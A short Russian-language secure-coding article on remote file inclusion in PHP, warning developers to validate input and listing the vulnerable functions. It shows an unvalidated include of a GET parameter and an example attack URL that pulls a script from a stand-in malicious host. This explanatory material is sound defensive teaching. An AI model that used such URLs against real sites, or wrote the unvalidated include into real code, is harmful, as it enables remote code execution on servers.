... include $_GET['file']; ...Если подобная строка кода вписывается в середине скрипта, то подключение файла происходит через переменную file, получая путь методом GET. Из предыдущих статей мы знаем, что все переменные получаемые двумя методами GET и POST могут легко изменяться пользователем. Если путь к файлу посредством вашего скрипта происходит подобным способом, то злоумышленник его изменяет:
script.php?file=primer.txtна
script.php?file=http://malware.com/worm.phpпосле чего последует загрузка скрипта с другого сервера, затем произойдёт выполнение вредоносного кода. Без изменений остается один совет для обеспечения безопасности таких скриптов: для входящих переменных необходима предварительная проверка. Во время обработки внимательно следите за типом переменной, её длиной и регулярными выражениями. Следующие функции являются уязвимыми:
include() require() include_once() require_once() file_get_contents() fopen()Обработка входящих данных крайне важна для безопасности веб-приложений, потому что злоумышленником может быть любой пользователь. Поэтому важно проверять каждый запрос от пользователя.